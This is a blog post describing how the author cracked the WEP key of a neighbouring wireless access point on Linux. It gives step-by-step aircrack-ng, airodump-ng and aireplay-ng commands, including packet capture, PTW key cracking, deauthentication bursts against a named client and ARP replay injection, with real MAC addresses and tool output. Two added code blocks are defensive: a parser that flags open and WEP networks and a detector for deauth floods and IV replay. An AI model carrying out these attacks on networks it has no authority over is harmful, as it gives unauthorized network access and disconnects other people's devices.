momo zone

The kernel tuner's blog

A complete write-up of cracking a wireless AP's WEP under Linux

In fact I went down a few detours at the start: I assumed Intel's 4965 card did not support injection attacks, so I simply captured packets with airodump and cracked them, and it actually succeeded on the first try. Thinking it over later, that was purely because that AP was very active and its data count grew quickly.

Back to the point.
1. First, find a cracking driver suitable for the iwl4965. This was one of the detours: the iwl4965 driver has in fact long been in the kernel, and 2.6.26 supports injection (the types of injection are covered later). So there is no need to fiddle with this.

2. I had already compiled the kernel by hand once before, so, as my previous post said, the compat-wireless driver package has to be reinstalled after recompiling the kernel. Different versions of the package seem to support injection attacks to different degrees, so here is a site that hosts historical versions, http://www.orbit-lab.org/kernel/; try a few.

3. Download the aircrack-ng toolkit from http://www.aircrack-ng.org/doku.php; this one is indispensable.

4. Everything is ready (at least I think the groundwork is done now). Start monitor mode with airmon-ng:
airmon-ng start wlan0
And it throws a runtime error:
"Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2"
Looks like one more package is missing; nothing for it but to download it. This tool actually does the same job as iwconfig from compat-wireless, but airmon-ng only depends on iw.

5. After starting monitor mode a new interface, mon0, appears. The most remarkable thing about this interface is that it is completely independent of wlan0: operations on it do not affect wlan0 (in theory; on the 4965 channel switching still seems to interfere, as mentioned below).

6. airodump-ng mon0 starts capturing to see which APs are around. Oh, quite a few, and many are unencrypted, but the unencrypted ones have already been leeched off by just about everyone and are worthless. Here I go after the one with the strongest signal, which is also the most active.

 CH  6 ][ Elapsed: 8 s ][ 2009-05-17 11:45

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1C:F0:40:FB:F4  -90   0        2        0    0   6  54   WPA2 TKIP   PSK  sting
 00:23:CD:68:70:52   -1   0        0        9    0 133  -1   OPN              <length:  0>
 00:21:27:65:4B:1E  -89   0        3        0    0   6  54 . OPN              TP-LINK_654B1E
 00:21:27:65:5A:14  -89   0        8        1    0   6  54 . WEP  WEP         TP-LINK_655A14
 00:1D:0F:2C:95:24  -58   3       87        3    0   6  54 . WEP  WEP         sis
 00:14:78:EA:22:24  -80   2       87       32    3   6  54 . OPN              TP-LINK

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

 00:23:CD:68:70:52  00:0F:66:E7:4B:39  -89   0- 6      1        9
 00:21:27:65:5A:14  00:1B:77:D8:50:41   -1   1- 0      0        1
 00:1D:0F:2C:95:24  00:13:E8:13:AC:A9    0  54-54      0        4
 00:14:78:EA:22:24  00:13:02:CF:5D:19  -77   0-24    191       61
Rerun airodump-ng -c 6 -w sis --bssid 00:1D:0F:2C:95:24 mon0
It writes to a file named sisXXXX, where airodump-ng fills in the XXXX part itself. Before long the data count had reached 10,000.
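The same airodump-ng table read from the network owner's side, as an added example that is not code from the post or from the aircrack-ng project: a parser for the AP rows of an airodump-ng screen that turns a site survey into a remediation list of networks still running open or WEP. The column regex, the AccessPoint fields and the remediation wording are this example's own assumptions; the sample input is the post's own capture above, header and station table included.

```python
"""Parse the AP table that airodump-ng prints and list the networks whose
encryption needs remediation (open or WEP). Added example: not code from the
post or from the aircrack-ng project. The column regex, the AccessPoint fields
and the remediation wording are this example's own assumptions."""
import re
from dataclasses import dataclass

# Sample input copied from the post's airodump-ng screen; the header and the
# station table are included to show that the parser skips them.
SAMPLE_CAPTURE = """\
 CH  6 ][ Elapsed: 8 s ][ 2009-05-17 11:45

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1C:F0:40:FB:F4  -90   0        2        0    0   6  54   WPA2 TKIP   PSK  sting
 00:23:CD:68:70:52   -1   0        0        9    0 133  -1   OPN              <length:  0>
 00:21:27:65:4B:1E  -89   0        3        0    0   6  54 . OPN              TP-LINK_654B1E
 00:21:27:65:5A:14  -89   0        8        1    0   6  54 . WEP  WEP         TP-LINK_655A14
 00:1D:0F:2C:95:24  -58   3       87        3    0   6  54 . WEP  WEP         sis
 00:14:78:EA:22:24  -80   2       87       32    3   6  54 . OPN              TP-LINK

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

 00:23:CD:68:70:52  00:0F:66:E7:4B:39  -89   0- 6      1        9
 00:1D:0F:2C:95:24  00:13:E8:13:AC:A9    0  54-54      0        4
"""

# One AP row: BSSID PWR RXQ Beacons #Data #/s CH MB ENC [CIPHER [AUTH]] ESSID.
# The MB column may carry "e" (QoS) and/or "." (short preamble) after the rate.
# Station rows do not match because their second column is a MAC, not a number.
AP_ROW = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
    r"\s+(?P<pwr>-?\d+)\s+\d+\s+\d+\s+(?P<data>\d+)\s+\d+"
    r"\s+(?P<ch>-?\d+)\s+(?P<mb>-?\d+)\s*e?\s*\.?"
    r"\s+(?P<enc>WPA2|WPA|WEP|OPN)\s*(?P<rest>.*)$"
)

# How many attribute columns (cipher, auth) precede the ESSID for each ENC value.
ATTR_COLUMNS = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 2}


@dataclass
class AccessPoint:
    bssid: str
    essid: str
    hidden: bool
    channel: int
    power: int
    data_frames: int
    enc: str
    cipher: str
    auth: str


def parse_airodump(text):
    """Return one AccessPoint per AP row in an airodump-ng screen dump."""
    aps = []
    for line in text.splitlines():
        m = AP_ROW.match(line)
        if not m:
            continue
        enc = m.group("enc")
        fields = m.group("rest").split()
        n = ATTR_COLUMNS[enc]
        attrs, essid = fields[:n], " ".join(fields[n:])  # ESSID whitespace is normalised
        aps.append(AccessPoint(
            bssid=m.group("bssid"), essid=essid,
            hidden=essid.startswith("<length:"),  # airodump-ng's marker for a cloaked ESSID
            channel=int(m.group("ch")), power=int(m.group("pwr")),
            data_frames=int(m.group("data")), enc=enc,
            cipher=attrs[0] if len(attrs) > 0 else "",
            auth=attrs[1] if len(attrs) > 1 else "",
        ))
    return aps


REMEDIATION = {
    "OPN": "no link-layer encryption; every frame is readable in range",
    "WEP": "WEP (RC4, 24-bit IV) is broken; the post recovers a key from ~10,000 frames",
}


def weak_aps(aps):
    """(AccessPoint, reason) for every network that should move to WPA2/WPA3."""
    return [(ap, REMEDIATION[ap.enc]) for ap in aps if ap.enc in REMEDIATION]


if __name__ == "__main__":
    for ap, why in weak_aps(parse_airodump(SAMPLE_CAPTURE)):
        print(f"ch {ap.channel:>3}  {ap.bssid}  {ap.enc:<4} {ap.essid!r}: {why}")
```

Run on the post's table it lists five of the six networks (three open, two WEP); only the WPA2/TKIP/PSK network is left off the remediation list. The regex accepts the "e" and "." suffixes airodump-ng attaches to the MB column, so rows from other captures parse the same way.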

7. Open a new shell window and start cracking: aircrack-ng -z sis*.cap
The -z option here means cracking with the new PTW method: a key that used to need 200,000 packets now needs only 20,000.
This time 10,000 was enough; this AP's key was just too simple, and 10,000 packets broke it.

8. Of course, cracking APs that need no injection attack is no challenge at all. Next I want to crack the "wasted" APs (almost nobody uses them, so there is no data). Injection attacks are more involved and are mainly done with aireplay-ng. The injection attacks this tool supports are as follows:

Now test with Attack 9: Injection test:
aireplay-ng -9 mon0
12:30:56  Trying broadcast probe requests…
12:30:56  Injection is working!
12:30:58  Found 2 APs

OK, that works.

9. Try the first one first:

aireplay-ng -0 1 -a 00:21:27:65:5A:14 -c 00:1B:77:D8:50:41 mon0

This attack is mainly used to achieve the following effects:

  • Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
  • Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  • Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Here the third point is the main one.
aireplay-ng -0 10  -a 00:14:78:EA:22:24  -c 00:1B:77:D8:50:41   mon0
12:48:24  Waiting for beacon frame (BSSID: 00:14:78:EA:22:24) on channel 6
12:48:25  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|42 ACKs]
12:48:26  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|57 ACKs]
12:48:34  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|397 ACKs]
12:48:44  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|456 ACKs]
12:48:54  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|480 ACKs]
12:49:04  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|456 ACKs]
12:49:14  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|474 ACKs]
12:49:23  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|458 ACKs]
12:49:34  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|80 ACKs]
12:49:49  Sending 64 directed DeAuth. STMAC: [00:1B:77:D8:50:41] [ 0|262 ACKs]
But this attack method has nothing to do with cracking the key!

10. The -1 attack method is unfortunately not supported on the 4965:

aireplay-ng -1 0 -e sis -a 00:1D:0F:2C:95:24 -h 00:13:E8:13:AC:A9 mon0

13:40:23  Sending Authentication Request (Open System)
13:40:26  Sending Authentication Request (Open System)
13:40:29  Sending Authentication Request (Open System)
13:40:32  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

11. Next, the -3 attack method; this is the most effective attack method found so far for the 4965, although not the fastest.

The precondition is that an authorized host is already connected to the target AP. Then run aireplay-ng -3 -b 00:1D:0F:2C:95:24 mon0
to listen for ARP. When the authorized host sends an ARP request to the AP, aireplay intercepts it and resends the packet; the AP is fooled into returning an ARP ack, and at that point airodump's data count rises. When it reaches 20,000, go and crack it.
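On the defending side, the two aireplay-ng attacks this post ends up using (the directed deauth of step 9 and the ARP replay of step 11) both leave a signature a wireless IDS can count. The following is an added example, not code from the post or from aircrack-ng: the Frame record is an assumed abstraction of the fields a monitor-mode capture tool decodes from the 802.11 header, the sample frames are constructed (MAC addresses taken from the post's airodump-ng table and aireplay-ng log), and the windows and thresholds are illustrative. A deauth flood shows up as dozens of deauthentication frames to one station within seconds, like the "64 directed DeAuth" bursts in the log above; a replay shows up as the same WEP IV re-sent by the same transmitter, because the IV travels in the clear and a compliant station does not repeat one within seconds, while the AP's replies that the attacker is harvesting each carry a fresh IV.

```python
"""Two wireless-IDS detections for the attacks the post demonstrates: a
deauthentication flood (aireplay-ng -0) and WEP frame replay (aireplay-ng -3).
Added example, not code from the post or from aircrack-ng. Frame is an assumed
abstraction of fields decoded from the 802.11 header; the capture below is
constructed, with MAC addresses taken from the post's airodump-ng table."""
from collections import defaultdict, deque
from typing import NamedTuple, Optional


class Frame(NamedTuple):
    t: float            # capture time in seconds
    kind: str           # "deauth", "data", ...
    bssid: str
    src: str
    dst: str
    iv: Optional[int]   # WEP IV, sent in the clear; None when the frame is not WEP


AP1, STA1 = "00:14:78:EA:22:24", "00:1B:77:D8:50:41"   # deauth target pair in the post's log
AP2, STA2 = "00:1D:0F:2C:95:24", "00:13:E8:13:AC:A9"   # the WEP AP "sis" and its client


def constructed_capture():
    """Constructed sample: one normal deauth, two deauth bursts shaped like the
    post's log, normal WEP traffic, then a replayed ARP request and its replies."""
    frames = [Frame(0.5, "deauth", AP1, AP1, "00:13:02:CF:5D:19", None)]  # a client leaving
    for start in (10.0, 21.0):           # 64 directed deauth frames, about 10 s apart
        frames += [Frame(start + i * 0.01, "deauth", AP1, AP1, STA1, None) for i in range(64)]
    frames += [Frame(40.0 + i, "data", AP2, STA2, AP2, 0x100 + i) for i in range(5)]  # fresh IVs
    # The same captured frame (same IV, same ciphertext) re-sent 30 times in 3 s ...
    frames += [Frame(50.0 + i * 0.1, "data", AP2, STA2, AP2, 0x0A1B2C) for i in range(30)]
    # ... and the AP's replies, each a fresh encryption with a new IV.
    frames += [Frame(50.05 + i * 0.1, "data", AP2, AP2, STA2, 0x2000 + i) for i in range(30)]
    return frames


def _windowed_alerts(events, window, threshold, label):
    """events: (t, key) pairs in time order. Raise one alert per key per window
    once `threshold` events for that key fall inside `window` seconds."""
    recent = defaultdict(deque)
    muted_until = {}
    alerts = []
    for t, key in events:
        q = recent[key]
        q.append(t)
        while t - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and muted_until.get(key, -1.0) < t:
            alerts.append((label, t, key, len(q)))
            muted_until[key] = t + window   # one alert per key per window
    return alerts


def detect_deauth_floods(frames, window=10.0, threshold=20):
    """Many deauthentication frames to one station in a short window."""
    ordered = sorted(frames, key=lambda f: f.t)
    events = ((f.t, (f.bssid, f.dst)) for f in ordered if f.kind == "deauth")
    return _windowed_alerts(events, window, threshold, "deauth-flood")


def detect_iv_replay(frames, window=10.0, threshold=10):
    """The same WEP IV re-sent by the same transmitter: a compliant station
    does not repeat an IV within seconds, so repeats mean a replayed frame."""
    ordered = sorted(frames, key=lambda f: f.t)
    events = ((f.t, (f.src, f.iv)) for f in ordered if f.iv is not None)
    return _windowed_alerts(events, window, threshold, "iv-replay")


if __name__ == "__main__":
    cap = constructed_capture()
    for alert in detect_deauth_floods(cap) + detect_iv_replay(cap):
        print(alert)
```

On the constructed capture this raises two deauth-flood alerts (one per burst, each fired at the 20th frame) and one IV-replay alert for the station whose frame is being re-sent; the single deauth from a client leaving, the station's own fresh-IV traffic and the AP's replies stay silent. Detection is the fallback: 802.11w management-frame protection authenticates deauthentication frames so a forged one is dropped, and retiring WEP removes the cleartext-IV replay the -3 attack depends on.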
